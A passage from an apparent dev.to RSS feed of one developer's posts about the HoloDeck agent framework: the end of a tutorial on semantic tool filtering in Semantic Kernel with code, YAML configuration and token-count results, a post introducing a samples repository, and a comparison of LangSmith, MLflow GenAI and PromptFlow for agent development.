&lt;p&gt;Semantic Kernel has a &lt;code&gt;FunctionChoiceBehavior&lt;/code&gt; class that controls which functions the LLM can call. It supports a &lt;code&gt;filters&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def create_function_choice_behavior(
    self, filtered_tools: list[str]
) -&amp;gt; FunctionChoiceBehavior:
    return FunctionChoiceBehavior.Auto(
        filters={"included_functions": filtered_tools}
    )

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. Pass in a list of tool names, and SK only sends those tool definitions to the LLM.&lt;/p&gt;

&lt;p&gt;The manager wires it all together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def prepare_execution_settings(
    self,
    query: str,
    base_settings: PromptExecutionSettings,
) -&amp;gt; PromptExecutionSettings:
    if not self.config.enabled:
        return base_settings

    # Filter tools based on query
    filtered_tools = await self.filter_tools(query)

    # Create behavior with only filtered tools
    function_choice = self.create_function_choice_behavior(filtered_tools)

    # Clone settings and attach filtered behavior
    cloned = self._clone_settings(base_settings)
    cloned.function_choice_behavior = function_choice

    return cloned

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Configuration
&lt;/h2&gt;

&lt;p&gt;I made it all YAML-configurable because that's the HoloDeck way:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tool_filtering:
  enabled: true
  top_k: 5 # Max tools per request
  similarity_threshold: 0.5 # Minimum score for inclusion
  always_include:
    - search_papers # Critical tools always available
  always_include_top_n_used: 0 # Disable until usage patterns stabilize
  search_method: hybrid # Options: semantic, bm25, hybrid

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Sensible Defaults
&lt;/h3&gt;

&lt;p&gt;Here's what I recommend starting with:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Rationale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;top_k&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;5&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enough tools for most tasks without token bloat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;similarity_threshold&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0.5&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Include tools at least 50% as relevant as top result&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;always_include&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;[]&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent-specific—add your critical tools here&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;always_include_top_n_used&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Avoid early usage bias; enable after patterns stabilize&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;search_method&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;hybrid&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Best of semantic + keyword matching&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Threshold Tuning by Search Method
&lt;/h3&gt;

&lt;p&gt;All search methods now return normalized scores in the 0-1 range, making the &lt;code&gt;similarity_threshold&lt;/code&gt; consistent across methods:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Good Match Range&lt;/th&gt;
&lt;th&gt;Recommended Threshold&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;semantic&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0.4 - 0.6&lt;/td&gt;
&lt;td&gt;0.3 - 0.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;bm25&lt;/strong&gt; (normalized)&lt;/td&gt;
&lt;td&gt;0.8 - 1.0&lt;/td&gt;
&lt;td&gt;0.5 - 0.6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;hybrid&lt;/strong&gt; (normalized)&lt;/td&gt;
&lt;td&gt;0.8 - 1.0&lt;/td&gt;
&lt;td&gt;0.5 - 0.6&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A threshold of 0.5 means "include tools scoring at least 50% of what the top result scores." This filters out clearly irrelevant tools while keeping useful ones.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuration Knobs
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;top_k&lt;/strong&gt; : How many tools max per request&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;similarity_threshold&lt;/strong&gt; : Below this score, tools get filtered out&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;always_include&lt;/strong&gt; : Your core tools that should always be available&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;always_include_top_n_used&lt;/strong&gt; : Adaptive optimization—frequently used tools stay in context. &lt;strong&gt;Caution:&lt;/strong&gt; This tracks usage across requests, so early/accidental tool calls can bias future filtering. Keep at 0 during development.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's the full agent configuration I was testing with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# HoloDeck Research Agent Configuration
name: "research-agent"
description: "Research analysis AI assistant"

model:
  provider: azure_openai
  name: gpt-5.2

instructions:
  file: instructions/system-prompt.md

# Tools Configuration
tools:
  # Vectorstore for research paper search
  - type: vectorstore
    name: search_papers
    description: Search research papers and documents for relevant passages
    source: data/papers_index.json
    embedding_model: text-embedding-3-small
    top_k: 5
    database:
      provider: chromadb

  # Brave Search MCP Server (exposes 6 functions)
  - type: mcp
    name: brave_search
    description: Web search using Brave Search API
    command: npx
    args: ["-y", "@brave/brave-search-mcp-server"]
    env:
      BRAVE_API_KEY: ${BRAVE_API_KEY}

  # Memory MCP Server (exposes 9 functions)
  - type: mcp
    name: memory
    description: Persistent memory using local knowledge graph
    command: npx
    args: ["-y", "@modelcontextprotocol/server-memory"]

# Tool Filtering - This is where the magic happens
tool_filtering:
  enabled: true
  top_k: 5
  similarity_threshold: 0.5
  always_include:
    - search_papers
  always_include_top_n_used: 0
  search_method: hybrid

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three tool sources. 16 total functions exposed. Without filtering, every request sends all 16 tool schemas.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Results
&lt;/h2&gt;

&lt;p&gt;Let me show you actual API payloads. With filtering &lt;strong&gt;off&lt;/strong&gt; , here's what gets sent for a simple "hi there":&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", "description": "Search research papers...", "parameters": {...}}},
    {"type": "function", "function": {"name": "brave_search-brave_image_search", "description": "Performs an image search...", "parameters": {"properties": {"query": {...}, "country": {...}, "search_lang": {...}, "count": {...}, "safesearch": {...}, "spellcheck": {...}}, ...}}},
    {"type": "function", "function": {"name": "brave_search-brave_local_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_news_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_summarizer", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_video_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}},
    {"type": "function", "function": {"name": "memory-add_observations", ...}},
    {"type": "function", "function": {"name": "memory-create_entities", ...}},
    {"type": "function", "function": {"name": "memory-create_relations", ...}},
    {"type": "function", "function": {"name": "memory-delete_entities", ...}},
    {"type": "function", "function": {"name": "memory-delete_observations", ...}},
    {"type": "function", "function": {"name": "memory-delete_relations", ...}},
    {"type": "function", "function": {"name": "memory-open_nodes", ...}},
    {"type": "function", "function": {"name": "memory-read_graph", ...}},
    {"type": "function", "function": {"name": "memory-search_nodes", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;16 tools. 5,888 tokens.&lt;/strong&gt; For "hi there."&lt;/p&gt;

&lt;p&gt;Look at those Brave Search parameter schemas—country code enums, language preferences, pagination options, safesearch filters. Each tool definition is a token hog.&lt;/p&gt;

&lt;p&gt;With filtering &lt;strong&gt;on&lt;/strong&gt; :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2 tools. 1,016 tokens.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's an &lt;strong&gt;83% reduction&lt;/strong&gt; —from 5,888 tokens down to 1,016.&lt;/p&gt;

&lt;p&gt;The logs tell the story:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Tool filtering: 2/16 tools selected for query: 'hi there...'
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search']

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a real research query like "Find papers on transformer architectures on the web", the filtering gets smarter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Tool filtering: 3/16 tools selected
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search', 'memory-search_nodes']

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The right tools. Automatically. Based on what the user actually asked.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. MCP servers are tool factories.&lt;/strong&gt; A single MCP server can expose dozens of functions. Without filtering, your token costs explode.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Tokenization matters for BM25.&lt;/strong&gt; Make sure your tokenizer splits on underscores so &lt;code&gt;brave_web_search&lt;/code&gt; becomes &lt;code&gt;["brave", "web", "search"]&lt;/code&gt;. Otherwise keyword matching fails on tool names.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Normalize your search scores.&lt;/strong&gt; Raw BM25 scores range from 0-10+, and raw RRF scores are tiny (0.01-0.03). Both need normalization to 0-1 range, or your &lt;code&gt;similarity_threshold&lt;/code&gt; won't work consistently. Semantic search (cosine similarity) is already 0-1.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. After normalization, thresholds are consistent.&lt;/strong&gt; With all methods normalized, good matches score 0.8-1.0 for BM25/hybrid, and 0.4-0.6 for semantic. A threshold of 0.5 works well across methods.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. always_include is your safety net.&lt;/strong&gt; Some tools are so core to your agent that you never want them filtered out. Make that explicit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Be careful with always_include_top_n_used.&lt;/strong&gt; This feature tracks usage and auto-includes frequently used tools. Sounds great, but early/accidental usage can bias future requests. Keep it at 0 during development.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;This is just tool filtering. Anthropic's post also covers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Programmatic tool calling&lt;/strong&gt; : Let the model write code to process intermediate results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool use examples&lt;/strong&gt; : Providing concrete usage patterns to reduce parameter ambiguity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I might implement those next. But for now, getting 83% token reduction with a few hundred lines of code feels pretty good.&lt;/p&gt;




&lt;p&gt;The full implementation is in &lt;a href="https://github.com/justinbarias/holodeck/tree/main/src/holodeck/lib/tool_filter" rel="noopener noreferrer"&gt;HoloDeck's tool_filter module&lt;/a&gt;. PRs welcome.&lt;/p&gt;

</description>
      <category>tokens</category>
      <category>anthropic</category>
      <category>tool</category>
      <category>search</category>
    </item>
    <item>
      <title>[Boost]</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 09 Jan 2026 22:27:13 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/-4i0</link>
      <guid>https://dev.to/jeremiahbarias/-4i0</guid>
      <description>&lt;div class="ltag__link"&gt;
  &lt;a href="/jeremiahbarias" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__pic"&gt;
      &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3648698%2F59543698-c63b-4cb4-b342-f9924f3ae907.png" alt="jeremiahbarias"&gt;
    &lt;/div&gt;
  &lt;/a&gt;
  &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__content"&gt;
      &lt;h2&gt;HoloDeck Part 1: Why Building AI Agents Feels So Broken&lt;/h2&gt;
      &lt;h3&gt;Jeremiah Justin Barias ・ Dec 6 '25&lt;/h3&gt;
      &lt;div class="ltag__link__taglist"&gt;
        &lt;span class="ltag__link__tag"&gt;#ai&lt;/span&gt;
        &lt;span class="ltag__link__tag"&gt;#agents&lt;/span&gt;
        &lt;span class="ltag__link__tag"&gt;#evals&lt;/span&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/a&gt;
&lt;/div&gt;


</description>
      <category>ai</category>
      <category>agents</category>
      <category>evals</category>
    </item>
    <item>
      <title>Holodeck samples</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 09 Jan 2026 22:23:43 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-samples-1ec2</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-samples-1ec2</guid>
      <description>&lt;p&gt;If you want to get moving fast with HoloDeck, this samples repo is the quickest on-ramp. It's a set of ready-to-run examples you can run, poke around in, and fork as templates:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/justinbarias/holodeck-samples" rel="noopener noreferrer"&gt;https://github.com/justinbarias/holodeck-samples&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Configuring Prerequisites&lt;/li&gt;
&lt;li&gt;Explore the use cases&lt;/li&gt;
&lt;li&gt;Coding assistant integration (Claude Code, GitHub Copilot)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Configuring Prerequisites
&lt;/h2&gt;

&lt;p&gt;You'll need a handful of things installed to run the samples locally:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Clone the repo&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Install HoloDeck CLI&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Grab the supporting tools&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fire up the shared infrastructure&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pick a sample + provider&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Fire up the agent and frontend&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Explore the use cases
&lt;/h2&gt;

&lt;p&gt;Here are the four use cases, each with OpenAI, Azure OpenAI, and Ollama flavors:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ticket Routing&lt;/strong&gt; (&lt;code&gt;ticket-routing/&lt;/code&gt;) - Routes support tickets with structured outputs and confidence scores.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customer Support&lt;/strong&gt; (&lt;code&gt;customer-support/&lt;/code&gt;) - RAG-powered chatbot with memory and escalation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content Moderation&lt;/strong&gt; (&lt;code&gt;content-moderation/&lt;/code&gt;) - Multi-category moderation with policy enforcement and consistency checks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Legal Summarization&lt;/strong&gt; (&lt;code&gt;legal-summarization/&lt;/code&gt;) - Clause extraction, risk flags, and summary quality metrics.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each sample sticks to the same layout, so you can find stuff fast:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;use-case&amp;gt;/&amp;lt;provider&amp;gt;/
├── agent.yaml
├── config.yaml
├── .env.example
├── instructions/
├── data/
└── copilotkit/

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Coding assistant integration (Claude Code, GitHub Copilot)
&lt;/h2&gt;

&lt;p&gt;The repo also comes with built-in prompts for both Claude Code and GitHub Copilot to speed up agent authoring and tuning.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Slash commands live in &lt;code&gt;.claude/commands/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/holodeck.create&lt;/code&gt; - Guided wizard for creating a new agent&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/holodeck.tune path/to/agent.yaml&lt;/code&gt; - Tuning helper that boosts test performance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;GitHub Copilot&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prompt files live in &lt;code&gt;.github/prompts/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;holodeck-create&lt;/code&gt; and &lt;code&gt;holodeck-tune&lt;/code&gt; provide the same workflows as guided prompts&lt;/li&gt;
&lt;li&gt;In VS Code, type &lt;code&gt;/&lt;/code&gt; or &lt;code&gt;#prompt:&lt;/code&gt; in Copilot Chat to launch them&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both tools are great for small, reviewable tweaks. Keep secrets out of prompts, and sanity-check changes by running the sample after edits.&lt;/p&gt;




&lt;p&gt;Star, clone, fork, or use however you like! If you run into issues, file them &lt;a href="https://github.com/justinbarias/holodeck-samples/issues" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>holodeck</category>
      <category>ai</category>
      <category>agents</category>
    </item>
    <item>
      <title>HoloDeck Part 2: What's Out There for AI Agents</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880</guid>
      <description>&lt;p&gt;In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Part 1&lt;/a&gt;, I talked about why agent development feels broken. Before building something myself, I spent time looking at what's already out there. Here's what I found.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 2 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Why It Feels Broken&lt;/a&gt; - What's wrong with agent development&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What's Out There&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;What I'm Building&lt;/a&gt; - HoloDeck's approach and how it works&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Landscape
&lt;/h2&gt;

&lt;p&gt;A bunch of platforms tackle parts of this problem. I wanted something open-source, self-hosted, and config-driven—something that fits into existing CI/CD workflows without vendor lock-in. That shaped how I evaluated these tools.&lt;/p&gt;




&lt;h2&gt;
  
  
  Developer Tools &amp;amp; Frameworks
&lt;/h2&gt;

&lt;h3&gt;
  
  
  LangSmith (LangChain Team)
&lt;/h3&gt;

&lt;p&gt;LangSmith is really good at what it does—production observability and tracing for LangChain apps. If you're already in the LangChain ecosystem and need monitoring, it's solid.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;LangSmith&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-based, works in any pipeline&lt;/td&gt;
&lt;td&gt;API-based, needs cloud connectivity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Python code + LangChain SDK&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Production observability &amp;amp; tracing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Not designed for multi-agent workflows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics (BLEU, METEOR, ROUGE, F1)&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom evaluators&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM, OpenAI-compatible)&lt;/td&gt;
&lt;td&gt;Via LangChain integrations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Different tools for different problems. LangSmith is about monitoring production apps; I was looking for something to help with the build-and-test loop.&lt;/p&gt;




&lt;h3&gt;
  
  
  MLflow GenAI (Databricks)
&lt;/h3&gt;

&lt;p&gt;MLflow is a beast for ML experiment tracking. Their GenAI additions are interesting, but it's designed for model comparison rather than agent workflows. If you're already using MLflow for ML ops, the GenAI features slot in nicely.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;MLflow GenAI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-native&lt;/td&gt;
&lt;td&gt;Python SDK + REST API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Lightweight, portable&lt;/td&gt;
&lt;td&gt;Heavy (ML tracking server, often Databricks)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Purpose-built for agents&lt;/td&gt;
&lt;td&gt;Focused on model evaluation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Multi-Agent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native orchestration patterns&lt;/td&gt;
&lt;td&gt;Single model/variant comparison&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Complexity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal (YAML)&lt;/td&gt;
&lt;td&gt;Higher (ML engineering mindset)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom scorers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The infrastructure overhead was the main thing that put me off. I wanted something lighter.&lt;/p&gt;




&lt;h3&gt;
  
  
  Microsoft PromptFlow
&lt;/h3&gt;

&lt;p&gt;PromptFlow has a nice visual approach—you can see your flows as graphs, which is great for understanding what's happening. But it's really about individual functions and tools, not full agent orchestration.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;PromptFlow&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI-first&lt;/td&gt;
&lt;td&gt;Python SDK, Azure-centric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scope&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full agent lifecycle&lt;/td&gt;
&lt;td&gt;Individual tools &amp;amp; functions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Design Target&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent workflows&lt;/td&gt;
&lt;td&gt;Single tool/AI function development&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Visual flow graphs + low-code Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Not designed for multi-agent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Limited (designed for Azure)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;td&gt;LLM-as-judge (GPT-based), F1/BLEU/ROUGE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you're building individual AI functions and live in Azure, PromptFlow makes sense. For agent-level work, it's not quite there.&lt;/p&gt;




